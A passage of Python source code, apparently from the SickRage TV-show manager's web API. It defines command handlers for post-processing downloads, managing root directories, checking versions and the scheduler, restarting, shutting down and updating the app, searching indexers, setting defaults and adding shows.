self.return_data, args = self.check_params(args, kwargs, "return_data", False, False, "bool", [])
self.process_method, args = self.check_params(args, kwargs, "process_method", False, False, "string",
["copy", "symlink", "hardlink", "move"])
self.is_priority, args = self.check_params(args, kwargs, "is_priority", False, False, "bool", [])
self.failed, args = self.check_params(args, kwargs, "failed", False, False, "bool", [])
self.type, args = self.check_params(args, kwargs, "type", "auto", None, "string", ["auto", "manual"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Manually post-process the files in the download folder """
if not self.path and not sickbeard.TV_DOWNLOAD_DIR:
return _responds(RESULT_FAILURE, msg="You need to provide a path or set TV Download Dir")
if not self.path:
self.path = sickbeard.TV_DOWNLOAD_DIR
if not self.type:
self.type = 'manual'
data = processTV.processDir(self.path, process_method=self.process_method, force=self.force_replace,
is_priority=self.is_priority, failed=self.failed, proc_type=self.type)
if not self.return_data:
data = ""
return _responds(RESULT_SUCCESS, data=data, msg="Started post-process for %s" % self.path)
class CMD_SickBeard(ApiCall):
_help = {"desc": "Get miscellaneous information about SickRage"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" dGet miscellaneous information about SickRage """
data = {"sr_version": sickbeard.BRANCH, "api_version": self.version,
"api_commands": sorted(function_mapper.keys())}
return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardAddRootDir(ApiCall):
_help = {
"desc": "Add a new root (parent) directory to SickRage",
"requiredParameters": {
"location": {"desc": "The full path to the new root (parent) directory"},
},
"optionalParameters": {
"default": {"desc": "Make this new location the default root (parent) directory"},
}
}
def __init__(self, args, kwargs):
# required
self.location, args = self.check_params(args, kwargs, "location", None, True, "string", [])
# optional
self.default, args = self.check_params(args, kwargs, "default", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Add a new root (parent) directory to SickRage """
self.location = urllib.unquote_plus(self.location)
location_matched = 0
index = 0
# disallow adding/setting an invalid dir
if not ek(os.path.isdir, self.location):
return _responds(RESULT_FAILURE, msg="Location is invalid")
root_dirs = []
if sickbeard.ROOT_DIRS == "":
self.default = 1
else:
root_dirs = sickbeard.ROOT_DIRS.split('|')
index = int(sickbeard.ROOT_DIRS.split('|')[0])
root_dirs.pop(0)
# clean up the list - replace %xx escapes by their single-character equivalent
root_dirs = [urllib.unquote_plus(x) for x in root_dirs]
for x in root_dirs:
if x == self.location:
location_matched = 1
if self.default == 1:
index = root_dirs.index(self.location)
break
if location_matched == 0:
if self.default == 1:
root_dirs.insert(0, self.location)
else:
root_dirs.append(self.location)
root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs]
root_dirs_new.insert(0, index)
root_dirs_new = '|'.join(unicode(x) for x in root_dirs_new)
sickbeard.ROOT_DIRS = root_dirs_new
return _responds(RESULT_SUCCESS, _get_root_dirs(), msg="Root directories updated")
class CMD_SickBeardCheckVersion(ApiCall):
_help = {"desc": "Check if a new version of SickRage is available"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
check_version = CheckVersion()
needs_update = check_version.check_for_new_version()
data = {
"current_version": {
"branch": check_version.get_branch(),
"commit": check_version.updater.get_cur_commit_hash(),
"version": check_version.updater.get_cur_version(),
},
"latest_version": {
"branch": check_version.get_branch(),
"commit": check_version.updater.get_newest_commit_hash(),
"version": check_version.updater.get_newest_version(),
},
"commits_offset": check_version.updater.get_num_commits_behind(),
"needs_update": needs_update,
}
return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardCheckScheduler(ApiCall):
_help = {"desc": "Get information about the scheduler"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get information about the scheduler """
my_db = db.DBConnection()
sql_results = my_db.select("SELECT last_backlog FROM info")
backlog_paused = sickbeard.searchQueueScheduler.action.is_backlog_paused() # @UndefinedVariable
backlog_running = sickbeard.searchQueueScheduler.action.is_backlog_in_progress() # @UndefinedVariable
next_backlog = sickbeard.backlogSearchScheduler.nextRun().strftime(dateFormat).decode(sickbeard.SYS_ENCODING)
data = {"backlog_is_paused": int(backlog_paused), "backlog_is_running": int(backlog_running),
"last_backlog": _ordinal_to_date_form(sql_results[0]["last_backlog"]),
"next_backlog": next_backlog}
return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardDeleteRootDir(ApiCall):
_help = {
"desc": "Delete a root (parent) directory from SickRage",
"requiredParameters": {
"location": {"desc": "The full path to the root (parent) directory to remove"},
}
}
def __init__(self, args, kwargs):
# required
self.location, args = self.check_params(args, kwargs, "location", None, True, "string", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Delete a root (parent) directory from SickRage """
if sickbeard.ROOT_DIRS == "":
return _responds(RESULT_FAILURE, _get_root_dirs(), msg="No root directories detected")
new_index = 0
root_dirs_new = []
root_dirs = sickbeard.ROOT_DIRS.split('|')
index = int(root_dirs[0])
root_dirs.pop(0)
# clean up the list - replace %xx escapes by their single-character equivalent
root_dirs = [urllib.unquote_plus(x) for x in root_dirs]
old_root_dir = root_dirs[index]
for curRootDir in root_dirs:
if not curRootDir == self.location:
root_dirs_new.append(curRootDir)
else:
new_index = 0
for curIndex, curNewRootDir in enumerate(root_dirs_new):
if curNewRootDir == old_root_dir: # compare by value, not identity
new_index = curIndex
break
root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs_new]
if len(root_dirs_new) > 0:
root_dirs_new.insert(0, new_index)
root_dirs_new = "|".join(unicode(x) for x in root_dirs_new)
sickbeard.ROOT_DIRS = root_dirs_new
# what if the root dir was not found?
return _responds(RESULT_SUCCESS, _get_root_dirs(), msg="Root directory deleted")
class CMD_SickBeardGetDefaults(ApiCall):
_help = {"desc": "Get SickRage's user default configuration value"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get SickRage's user default configuration value """
any_qualities, best_qualities = _map_quality(sickbeard.QUALITY_DEFAULT)
data = {"status": statusStrings[sickbeard.STATUS_DEFAULT].lower(),
"flatten_folders": int(sickbeard.FLATTEN_FOLDERS_DEFAULT), "initial": any_qualities,
"archive": best_qualities, "future_show_paused": int(sickbeard.COMING_EPS_DISPLAY_PAUSED)}
return _responds(RESULT_SUCCESS, data)
class CMD_SickBeardGetMessages(ApiCall):
_help = {"desc": "Get all messages"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
messages = []
for cur_notification in ui.notifications.get_notifications(self.rh.request.remote_ip):
messages.append({"title": cur_notification.title,
"message": cur_notification.message,
"type": cur_notification.type})
return _responds(RESULT_SUCCESS, messages)
class CMD_SickBeardGetRootDirs(ApiCall):
_help = {"desc": "Get all root (parent) directories"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get all root (parent) directories """
return _responds(RESULT_SUCCESS, _get_root_dirs())
class CMD_SickBeardPauseBacklog(ApiCall):
_help = {
"desc": "Pause or un-pause the backlog search",
"optionalParameters": {
"pause ": {"desc": "True to pause the backlog search, False to un-pause it"}
}
}
def __init__(self, args, kwargs):
# required
# optional
self.pause, args = self.check_params(args, kwargs, "pause", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Pause or un-pause the backlog search """
if self.pause:
sickbeard.searchQueueScheduler.action.pause_backlog() # @UndefinedVariable
return _responds(RESULT_SUCCESS, msg="Backlog paused")
else:
sickbeard.searchQueueScheduler.action.unpause_backlog() # @UndefinedVariable
return _responds(RESULT_SUCCESS, msg="Backlog un-paused")
class CMD_SickBeardPing(ApiCall):
_help = {"desc": "Ping SickRage to check if it is running"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Ping SickRage to check if it is running """
if sickbeard.started:
return _responds(RESULT_SUCCESS, {"pid": sickbeard.PID}, "Pong")
else:
return _responds(RESULT_SUCCESS, msg="Pong")
class CMD_SickBeardRestart(ApiCall):
_help = {"desc": "Restart SickRage"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Restart SickRage """
if not Restart.restart(sickbeard.PID):
return _responds(RESULT_FAILURE, msg='SickRage can not be restarted')
return _responds(RESULT_SUCCESS, msg="SickRage is restarting...")
class CMD_SickBeardSearchIndexers(ApiCall):
_help = {
"desc": "Search for a show with a given name on all the indexers, in a specific language",
"optionalParameters": {
"name": {"desc": "The name of the show you want to search for"},
"indexerid": {"desc": "Unique ID of a show"},
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"lang": {"desc": "The 2-letter language code of the desired show"},
}
}
def __init__(self, args, kwargs):
self.valid_languages = sickbeard.indexerApi().config['langabbv_to_id']
# required
# optional
self.name, args = self.check_params(args, kwargs, "name", None, False, "string", [])
self.lang, args = self.check_params(args, kwargs, "lang", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, "string",
self.valid_languages.keys())
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Search for a show with a given name on all the indexers, in a specific language """
results = []
lang_id = self.valid_languages[self.lang]
if self.name and not self.indexerid: # only name was given
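            # self.indexer == 0 means "search every configured indexer";
            # otherwise the loop is restricted to the single requested indexer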
for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]:
indexer_api_params = sickbeard.indexerApi(_indexer).api_params.copy()
if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE:
indexer_api_params['language'] = self.lang
indexer_api_params['actors'] = False
indexer_api_params['custom_ui'] = classes.AllShowsListUI
t = sickbeard.indexerApi(_indexer).indexer(**indexer_api_params)
try:
api_data = t[str(self.name).encode()]
except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error):
logger.log(u"API :: Unable to find show with id " + str(self.indexerid), logger.WARNING)
continue
for curSeries in api_data:
results.append({indexer_ids[_indexer]: int(curSeries['id']),
"name": curSeries['seriesname'],
"first_aired": curSeries['firstaired'],
"indexer": int(_indexer)})
return _responds(RESULT_SUCCESS, {"results": results, "langid": lang_id})
elif self.indexerid:
for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]:
indexer_api_params = sickbeard.indexerApi(_indexer).api_params.copy()
if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE:
indexer_api_params['language'] = self.lang
indexer_api_params['actors'] = False
t = sickbeard.indexerApi(_indexer).indexer(**indexer_api_params)
try:
my_show = t[int(self.indexerid)]
except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error):
logger.log(u"API :: Unable to find show with id " + str(self.indexerid), logger.WARNING)
return _responds(RESULT_SUCCESS, {"results": [], "langid": lang_id})
if not my_show.data['seriesname']:
logger.log(
u"API :: Found show with indexerid: " + str(
self.indexerid) + ", however it contained no show name", logger.DEBUG)
return _responds(RESULT_FAILURE, msg="Show contains no name, invalid result")
# found show
results = [{indexer_ids[_indexer]: int(my_show.data['id']),
"name": unicode(my_show.data['seriesname']),
"first_aired": my_show.data['firstaired'],
"indexer": int(_indexer)}]
break
return _responds(RESULT_SUCCESS, {"results": results, "langid": lang_id})
else:
return _responds(RESULT_FAILURE, msg="Either a unique id or name is required!")
class CMD_SickBeardSearchTVDB(CMD_SickBeardSearchIndexers):
_help = {
"desc": "Search for a show with a given name on The TVDB, in a specific language",
"optionalParameters": {
"name": {"desc": "The name of the show you want to search for"},
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"lang": {"desc": "The 2-letter language code of the desired show"},
}
}
def __init__(self, args, kwargs):
CMD_SickBeardSearchIndexers.__init__(self, args, kwargs)
self.indexerid, args = self.check_params(args, kwargs, "tvdbid", None, False, "int", [])
class CMD_SickBeardSearchTVRAGE(CMD_SickBeardSearchIndexers):
"""
Deprecated, TVRage is no more.
"""
_help = {
"desc":
"Search for a show with a given name on TVRage, in a specific language. "
"This command should not longer be used, as TVRage was shut down.",
"optionalParameters": {
"name": {"desc": "The name of the show you want to search for"},
"lang": {"desc": "The 2-letter language code of the desired show"},
}
}
def __init__(self, args, kwargs):
        # Leave this one as ApiCall so it doesn't try to search anything
# pylint: disable=W0233,W0231
ApiCall.__init__(self, args, kwargs)
def run(self):
return _responds(RESULT_FAILURE, msg="TVRage is no more, invalid result")
class CMD_SickBeardSetDefaults(ApiCall):
_help = {
"desc": "Set SickRage's user default configuration value",
"optionalParameters": {
"initial": {"desc": "The initial quality of a show"},
"archive": {"desc": "The archive quality of a show"},
"future_show_paused": {"desc": "True to list paused shows in the coming episode, False otherwise"},
"flatten_folders": {"desc": "Flatten sub-folders within the show directory"},
"status": {"desc": "Status of missing episodes"},
}
}
def __init__(self, args, kwargs):
# required
# optional
self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray"])
self.future_show_paused, args = self.check_params(args, kwargs, "future_show_paused", None, False, "bool", [])
self.flatten_folders, args = self.check_params(args, kwargs, "flatten_folders", None, False, "bool", [])
self.status, args = self.check_params(args, kwargs, "status", None, False, "string",
["wanted", "skipped", "ignored"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Set SickRage's user default configuration value """
quality_map = {'sdtv': Quality.SDTV,
'sddvd': Quality.SDDVD,
'hdtv': Quality.HDTV,
'rawhdtv': Quality.RAWHDTV,
'fullhdtv': Quality.FULLHDTV,
'hdwebdl': Quality.HDWEBDL,
'fullhdwebdl': Quality.FULLHDWEBDL,
'hdbluray': Quality.HDBLURAY,
'fullhdbluray': Quality.FULLHDBLURAY,
'unknown': Quality.UNKNOWN}
i_quality_id = []
a_quality_id = []
if self.initial:
for quality in self.initial:
i_quality_id.append(quality_map[quality])
if self.archive:
for quality in self.archive:
a_quality_id.append(quality_map[quality])
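        # Quality.combineQualities packs both lists into a single int: the
        # "initial" masks occupy the low bits and the "archive" (best) masks the
        # high bits (see sickbeard.common.Quality for the exact encoding)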
if i_quality_id or a_quality_id:
sickbeard.QUALITY_DEFAULT = Quality.combineQualities(i_quality_id, a_quality_id)
if self.status:
# convert the string status to a int
for status in statusStrings:
if statusStrings[status].lower() == str(self.status).lower():
self.status = status
break
# this should be obsolete because of the above
if self.status not in statusStrings:
raise ApiError("Invalid Status")
# only allow the status options we want
            if int(self.status) not in (3, 5, 6, 7):  # WANTED, SKIPPED, ARCHIVED, IGNORED
raise ApiError("Status Prohibited")
sickbeard.STATUS_DEFAULT = self.status
if self.flatten_folders is not None:
sickbeard.FLATTEN_FOLDERS_DEFAULT = int(self.flatten_folders)
if self.future_show_paused is not None:
sickbeard.COMING_EPS_DISPLAY_PAUSED = int(self.future_show_paused)
return _responds(RESULT_SUCCESS, msg="Saved defaults")
class CMD_SickBeardShutdown(ApiCall):
_help = {"desc": "Shutdown SickRage"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Shutdown SickRage """
if not Shutdown.stop(sickbeard.PID):
return _responds(RESULT_FAILURE, msg='SickRage can not be shut down')
return _responds(RESULT_SUCCESS, msg="SickRage is shutting down...")
class CMD_SickBeardUpdate(ApiCall):
_help = {"desc": "Update SickRage to the latest version available"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
check_version = CheckVersion()
if check_version.check_for_new_version():
if check_version.run_backup_if_safe():
check_version.update()
return _responds(RESULT_SUCCESS, msg="SickRage is updating ...")
return _responds(RESULT_FAILURE, msg="SickRage could not backup config ...")
return _responds(RESULT_FAILURE, msg="SickRage is already up to date")
class CMD_Show(ApiCall):
_help = {
"desc": "Get detailed information about a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get detailed information about a show """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
show_dict = {
"season_list": CMD_ShowSeasonList((), {"indexerid": self.indexerid}).run()["data"],
"cache": CMD_ShowCache((), {"indexerid": self.indexerid}).run()["data"]
}
genre_list = []
if show_obj.genre:
genre_list_tmp = show_obj.genre.split("|")
for genre in genre_list_tmp:
if genre:
genre_list.append(genre)
show_dict["genre"] = genre_list
show_dict["quality"] = get_quality_string(show_obj.quality)
any_qualities, best_qualities = _map_quality(show_obj.quality)
show_dict["quality_details"] = {"initial": any_qualities, "archive": best_qualities}
try:
show_dict["location"] = show_obj.location
except ShowDirectoryNotFoundException:
show_dict["location"] = ""
show_dict["language"] = show_obj.lang
show_dict["show_name"] = show_obj.name
show_dict["paused"] = (0, 1)[show_obj.paused]
show_dict["subtitles"] = (0, 1)[show_obj.subtitles]
show_dict["air_by_date"] = (0, 1)[show_obj.air_by_date]
show_dict["flatten_folders"] = (0, 1)[show_obj.flatten_folders]
show_dict["sports"] = (0, 1)[show_obj.sports]
show_dict["anime"] = (0, 1)[show_obj.anime]
show_dict["airs"] = str(show_obj.airs).replace('am', ' AM').replace('pm', ' PM').replace(' ', ' ')
show_dict["dvdorder"] = (0, 1)[show_obj.dvdorder]
if show_obj.rls_require_words:
show_dict["rls_require_words"] = show_obj.rls_require_words.split(", ")
else:
show_dict["rls_require_words"] = []
if show_obj.rls_ignore_words:
show_dict["rls_ignore_words"] = show_obj.rls_ignore_words.split(", ")
else:
show_dict["rls_ignore_words"] = []
show_dict["scene"] = (0, 1)[show_obj.scene]
show_dict["archive_firstmatch"] = (0, 1)[show_obj.archive_firstmatch]
show_dict["indexerid"] = show_obj.indexerid
show_dict["tvdbid"] = helpers.mapIndexersToShow(show_obj)[1]
show_dict["imdbid"] = show_obj.imdbid
show_dict["network"] = show_obj.network
if not show_dict["network"]:
show_dict["network"] = ""
show_dict["status"] = show_obj.status
        if helpers.tryInt(show_obj.nextaired, 1) > 693595:  # 1900
dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(show_obj.nextaired, show_dict['airs'], show_dict['network']))
show_dict['airs'] = sbdatetime.sbdatetime.sbftime(dt_episode_airs, t_preset=timeFormat).lstrip('0').replace(
' 0', ' ')
show_dict['next_ep_airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)
else:
show_dict['next_ep_airdate'] = ''
return _responds(RESULT_SUCCESS, show_dict)
class CMD_ShowAddExisting(ApiCall):
_help = {
"desc": "Add an existing show in SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
"location": {"desc": "Full path to the existing shows's folder"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"initial": {"desc": "The initial quality of the show"},
"archive": {"desc": "The archive quality of the show"},
"flatten_folders": {"desc": "True to flatten the show folder, False otherwise"},
"subtitles": {"desc": "True to search for subtitles, False otherwise"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "", [])
self.location, args = self.check_params(args, kwargs, "location", None, True, "string", [])
# optional
self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray"])
self.flatten_folders, args = self.check_params(args, kwargs, "flatten_folders",
bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, "bool", [])
        self.subtitles, args = self.check_params(args, kwargs, "subtitles", int(sickbeard.USE_SUBTITLES),
                                                 False, "int", [])
        # run() passes this to addShow(), so parse it here the same way CMD_ShowAddNew does
        self.archive_firstmatch, args = self.check_params(args, kwargs, "archive_firstmatch",
                                                          bool(sickbeard.ARCHIVE_DEFAULT), False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Add an existing show in SickRage """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if show_obj:
return _responds(RESULT_FAILURE, msg="An existing indexerid already exists in the database")
if not ek(os.path.isdir, self.location):
return _responds(RESULT_FAILURE, msg='Not a valid location')
indexer_name = None
indexer_result = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run()
if indexer_result['result'] == result_type_map[RESULT_SUCCESS]:
if not indexer_result['data']['results']:
return _responds(RESULT_FAILURE, msg="Empty results returned, check indexerid and try again")
if len(indexer_result['data']['results']) == 1 and 'name' in indexer_result['data']['results'][0]:
indexer_name = indexer_result['data']['results'][0]['name']
if not indexer_name:
return _responds(RESULT_FAILURE, msg="Unable to retrieve information from indexer")
# set indexer so we can pass it along when adding show to SR
indexer = indexer_result['data']['results'][0]['indexer']
quality_map = {'sdtv': Quality.SDTV,
'sddvd': Quality.SDDVD,
'hdtv': Quality.HDTV,
'rawhdtv': Quality.RAWHDTV,
'fullhdtv': Quality.FULLHDTV,
'hdwebdl': Quality.HDWEBDL,
'fullhdwebdl': Quality.FULLHDWEBDL,
'hdbluray': Quality.HDBLURAY,
'fullhdbluray': Quality.FULLHDBLURAY,
'unknown': Quality.UNKNOWN}
# use default quality as a fail-safe
new_quality = int(sickbeard.QUALITY_DEFAULT)
i_quality_id = []
a_quality_id = []
if self.initial:
for quality in self.initial:
i_quality_id.append(quality_map[quality])
if self.archive:
for quality in self.archive:
a_quality_id.append(quality_map[quality])
if i_quality_id or a_quality_id:
new_quality = Quality.combineQualities(i_quality_id, a_quality_id)
sickbeard.showQueueScheduler.action.addShow(
int(indexer), int(self.indexerid), self.location, default_status=sickbeard.STATUS_DEFAULT,
quality=new_quality, flatten_folders=int(self.flatten_folders), subtitles=self.subtitles,
default_status_after=sickbeard.STATUS_DEFAULT_AFTER, archive=self.archive_firstmatch
)
return _responds(RESULT_SUCCESS, {"name": indexer_name}, indexer_name + " has been queued to be added")
class CMD_ShowAddNew(ApiCall):
_help = {
"desc": "Add a new show to SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"initial": {"desc": "The initial quality of the show"},
"location": {"desc": "The path to the folder where the show should be created"},
"archive": {"desc": "The archive quality of the show"},
"flatten_folders": {"desc": "True to flatten the show folder, False otherwise"},
"status": {"desc": "The status of missing episodes"},
"lang": {"desc": "The 2-letter language code of the desired show"},
"subtitles": {"desc": "True to search for subtitles, False otherwise"},
"anime": {"desc": "True to mark the show as an anime, False otherwise"},
"scene": {"desc": "True if episodes search should be made by scene numbering, False otherwise"},
"future_status": {"desc": "The status of future episodes"},
"archive_firstmatch": {
"desc": "True if episodes should be archived when first match is downloaded, False otherwise"
},
}
}
def __init__(self, args, kwargs):
self.valid_languages = sickbeard.indexerApi().config['langabbv_to_id']
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.location, args = self.check_params(args, kwargs, "location", None, False, "string", [])
self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray"])
self.flatten_folders, args = self.check_params(args, kwargs, "flatten_folders",
bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, "bool", [])
self.status, args = self.check_params(args, kwargs, "status", None, False, "string",
["wanted", "skipped", "ignored"])
self.lang, args = self.check_params(args, kwargs, "lang", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, "string",
self.valid_languages.keys())
self.subtitles, args = self.check_params(args, kwargs, "subtitles", bool(sickbeard.USE_SUBTITLES),
False, "bool", [])
self.anime, args = self.check_params(args, kwargs, "anime", bool(sickbeard.ANIME_DEFAULT), False,
"bool", [])
self.scene, args = self.check_params(args, kwargs, "scene", bool(sickbeard.SCENE_DEFAULT), False,
"bool", [])
self.future_status, args = self.check_params(args, kwargs, "future_status", None, False, "string",
["wanted", "skipped", "ignored"])
self.archive_firstmatch, args = self.check_params(args, kwargs, "archive_firstmatch",
bool(sickbeard.ARCHIVE_DEFAULT), False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Add a new show to SickRage """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if show_obj:
return _responds(RESULT_FAILURE, msg="An existing indexerid already exists in database")
if not self.location:
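            # sickbeard.ROOT_DIRS is stored as "<default index>|<dir>|<dir>...";
            # the leading element selects which directory is the default below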
if sickbeard.ROOT_DIRS != "":
root_dirs = sickbeard.ROOT_DIRS.split('|')
root_dirs.pop(0)
default_index = int(sickbeard.ROOT_DIRS.split('|')[0])
self.location = root_dirs[default_index]
else:
return _responds(RESULT_FAILURE, msg="Root directory is not set, please provide a location")
if not ek(os.path.isdir, self.location):
return _responds(RESULT_FAILURE, msg="'" + self.location + "' is not a valid location")
quality_map = {'sdtv': Quality.SDTV,
'sddvd': Quality.SDDVD,
'hdtv': Quality.HDTV,
'rawhdtv': Quality.RAWHDTV,
'fullhdtv': Quality.FULLHDTV,
'hdwebdl': Quality.HDWEBDL,
'fullhdwebdl': Quality.FULLHDWEBDL,
'hdbluray': Quality.HDBLURAY,
'fullhdbluray': Quality.FULLHDBLURAY,
'unknown': Quality.UNKNOWN}
# use default quality as a fail-safe
new_quality = int(sickbeard.QUALITY_DEFAULT)
i_quality_id = []
a_quality_id = []
if self.initial:
for quality in self.initial:
i_quality_id.append(quality_map[quality])
if self.archive:
for quality in self.archive:
a_quality_id.append(quality_map[quality])
if i_quality_id or a_quality_id:
new_quality = Quality.combineQualities(i_quality_id, a_quality_id)
# use default status as a fail-safe
new_status = sickbeard.STATUS_DEFAULT
if self.status:
# convert the string status to a int
for status in statusStrings:
if statusStrings[status].lower() == str(self.status).lower():
self.status = status
break
if self.status not in statusStrings:
raise ApiError("Invalid Status")
# only allow the status options we want
if int(self.status) not in (WANTED, SKIPPED, IGNORED):
return _responds(RESULT_FAILURE, msg="Status prohibited")
new_status = self.status
# use default status as a fail-safe
default_ep_status_after = sickbeard.STATUS_DEFAULT_AFTER
if self.future_status:
# convert the string status to a int
for status in statusStrings:
if statusStrings[status].lower() == str(self.future_status).lower():
self.future_status = status
break
if self.future_status not in statusStrings:
raise ApiError("Invalid Status")
# only allow the status options we want
if int(self.future_status) not in (WANTED, SKIPPED, IGNORED):
return _responds(RESULT_FAILURE, msg="Status prohibited")
default_ep_status_after = self.future_status
indexer_name = None
indexer_result = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run()
if indexer_result['result'] == result_type_map[RESULT_SUCCESS]:
if not indexer_result['data']['results']:
return _responds(RESULT_FAILURE, msg="Empty results returned, check indexerid and try again")
if len(indexer_result['data']['results']) == 1 and 'name' in indexer_result['data']['results'][0]:
indexer_name = indexer_result['data']['results'][0]['name']
if not indexer_name:
return _responds(RESULT_FAILURE, msg="Unable to retrieve information from indexer")
# set indexer for found show so we can pass it along
indexer = indexer_result['data']['results'][0]['indexer']
        # build the show path only after the indexer lookup succeeds, so earlier
        # failures can't leave an empty show directory behind
show_path = ek(os.path.join, self.location, sanitize_filename(indexer_name))
# don't create show dir if config says not to
if sickbeard.ADD_SHOWS_WO_DIR:
logger.log(u"Skipping initial creation of " + show_path + " due to config.ini setting")
else:
dir_exists = helpers.makeDir(show_path)
if not dir_exists:
logger.log(u"API :: Unable to create the folder " + show_path + ", can't add the show", logger.ERROR)
return _responds(RESULT_FAILURE, {"path": show_path},
"Unable to create the folder " + show_path + ", can't add the show")
else:
helpers.chmodAsParent(show_path)
sickbeard.showQueueScheduler.action.addShow(
int(indexer), int(self.indexerid), show_path, default_status=new_status, quality=new_quality,
flatten_folders=int(self.flatten_folders), lang=self.lang, subtitles=self.subtitles, anime=self.anime,
scene=self.scene, default_status_after=default_ep_status_after, archive=self.archive_firstmatch
)
return _responds(RESULT_SUCCESS, {"name": indexer_name}, indexer_name + " has been queued to be added")
class CMD_ShowCache(ApiCall):
_help = {
"desc": "Check SickRage's cache to see if the images (poster, banner, fanart) for a show are valid",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Check SickRage's cache to see if the images (poster, banner, fanart) for a show are valid """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
# TODO: catch if cache dir is missing/invalid.. so it doesn't break show/show.cache
